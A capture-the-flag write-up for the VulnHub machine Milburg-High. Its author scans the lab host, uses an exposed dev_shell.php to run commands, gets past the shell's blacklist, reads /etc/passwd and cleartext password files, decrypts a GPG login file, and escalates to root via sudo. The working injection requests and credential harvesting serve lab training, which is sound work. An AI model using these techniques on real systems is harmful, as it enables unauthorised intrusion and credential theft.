Contents
- 1 Objective
- 2 Methodology
- 2.1 Discovery
- 2.2 Entry Point #1 - Port 80 (HTTP)
- 2.2.1 Enumeration
- 2.3 Exploitation
- 3 Final Notes
- 4 Appendix A: Vulnerability Detail and Mitigation
Objective
Acquire root access and get hold of the flag in /
Source: [VulnHub.com]
Status: [Completed]
Methodology
Define our target
root@kali:# export TANGO=192.168.56.101
Discovery
root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGOPORT STATE SERVICE VERSION21/tcp open ftp ProFTPD 1.3.5b80/tcp open http Apache httpd 2.4.25 ((Debian))25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Entry Point #1 - Port 80 (HTTP)
Enumeration
root@blaksec:~# nikto -h $TANGO- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.101+ Target Hostname: 192.168.56.101+ Target Port: 80+ Start Time: 2018-05-24 18:19:38 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.25 (Debian)+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1 + The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found.+ /login.html: Admin login page/section found.+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host+ End Time: 2018-05-24 18:19:49 (GMT-4) (11 seconds)---------------------------------------------------------------------------
Let's take a closer look at that robots.txt
root@kali:~# curl http://$TANGO/robots.txtUser-agent: *Disallow: /login.phpDisallow: /dev_shell.phpDisallow: /lat_memo.htmlDisallow: /passwords.html
dev_shell.php sounds very promising. Dive dive dive!
Exploitation
After good 30 mins of poking it appeared there is some sort of blaklist - commands like ls, pwd, cat, nc are being blocked. Nothing we can't work around though - all we had to do is to replace ls with find, echo, dir, and cat with strings (see Exploiting web shells - working your way around blacklisted commands for more sweet workarounds).
Let's see what we have!
root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php...c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bashbob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bashjc:x:1002:1002:James C,,,:/home/jc:/bin/bashseb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bashelliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bashsshd:x:116:65534::/run/sshd:/usr/sbin/nologinproftpd:x:117:65534::/run/proftpd:/bin/falseftp:x:118:65534::/srv/ftp:/bin/false...
Looks like a few regular users on this host. Check them out
curl -s -d "in_command=find /home" -X POST http://$TANGO/dev_shell.php -o files_home.txt
Bunch of goodies turned up! For the most notable ones:
/home/seb/proftpd-1.3.3c/home/bob/.old_passwordfile.html/home/bob/Documents/Secret/home/bob/Documents/Secret/Keep_Out/home/bob/Documents/Secret/Keep_Out/Not_p*rn/home/bob/Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here/home/bob/Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here/notes.sh/home/bob/Documents/Secret/Keep_Out/p*rn/home/bob/Documents/Secret/Keep_Out/p*rn/no_p*rn_4_u/home/bob/Documents/staff.txt/home/bob/Documents/login.txt.gpg/home/bob/Downloads/Wheel_Of_Fortune.py/home/bob/Downloads/Hello_Again.py/home/elliot/theadminisdumb.txt
Quick look through the files... few quite interesting entries! The last one was fun to read - elliot b*ches and moans about admin bragging about his new password.. wait.. yei! we have a password!
root@blaksec:~# curl -s -d "in_command=strings /home/elliot/theadminisdumb.txt" -X POST http://$TANGO/dev_shell.php...theadminisdumb...
Aaaaaand we're in!!!
# ssh elliot@$TANGO -p 25468 __ __ _ _ _ _____ | \/ (_) | | / ____| | \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __ | |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__| | | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ | |_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_| __/ | |___/ elliot@192.168.56.101's password: Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64elliot@Milburg-High:~$
Poking around /home(s)... seb does not seem to have anything interesting and neither does jc. bob, however, is worth exploring!
elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html hey n there .old_passwordfile.htmlelliot@Milburg-High:/home/bob$ aliasalias cat='echo hey \n there'*** rolling my eyes ***elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html <html>jc:Qwertyseb:T1tanium_Pa$$word_Hack3rs_Fear_M3</p></html>
su'd to each of these users just to see if any interesting sudo roles but nothing fun there so back to bob!
elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpgfile login.txt.gpglogin.txt.gpg: GPG symmetrically encrypted data (AES cipher)
Spent good hour poking around trying to find the right pass and then found this file. Well actually I found it earlier and opened it prob 5-6 times.. and then stared at it.. and then squinted.. and it's only when I executed that notes.sh script it hit me!
elliot@Milburg-High:/home/bob$ ./Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here/notes.sh -= Notes =-Harry Potter is my favioriteAre you the real me?Right, I'm ordering pizza this is going nowherePeople just don't get meOhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>CucumberRest now your eyes are sleepyAre you gonna stop reading this yet?Time to fix the serverEveryone is annoyingSticky notes gotta buy em
'HARPOCRATES'
Let's test if it the right pass
elliot@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg<g --batch --passphrase HARPOCRATES -d login.txt.gpggpg: keybox '/home/seb/.gnupg/pubring.kbx' createdgpg: AES encrypted datagpg: encrypted with 1 passphrasebob:b0bcat_
From here it's pretty much a wrap up
elliot@Milburg-High:/home/bob$ su bobPassword: bob@Milburg-High:~$ sudo -l[sudo] password for bob: Matching Defaults entries for bob on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser bob may run the following commands on localhost: (ALL : ALL) ALLbob@Milburg-High:~$ sudo su -root@Milburg-High:/# strings flag.txt CONGRATS ON GAINING ROOT .-. ( ) |~| _.--._ |~|~:'--~' | | | : #root | | | : _.--._| |~|~`'--~' | | | | | | | | | | | | | | | | | | _____|_|_________ Thanks for playing ~c0rruptedb1troot@Milburg-High:/#
Final Notes
Sometimes it is Ok to follow your gut feel and deviate from your own style (e.g. trying spawn a reverse shell) - fun things can be lying in plain view.
Appendix A: Vulnerability Detail and Mitigation
| Rating | High |
| Description | Copies of user passwords were found stored in clear-text files |
| Impact | Taking over an account would allow perpetrator to access all privileges and functions granted to that account, including but not limited to access accessing restricted data and processes, running restricted programs, elevated access through sudo roles. |
| Remediation | Put policies in place educating users about dangers of storing credentials in unprotected files. Establish a process to perform periodic system scans to detect such data. |
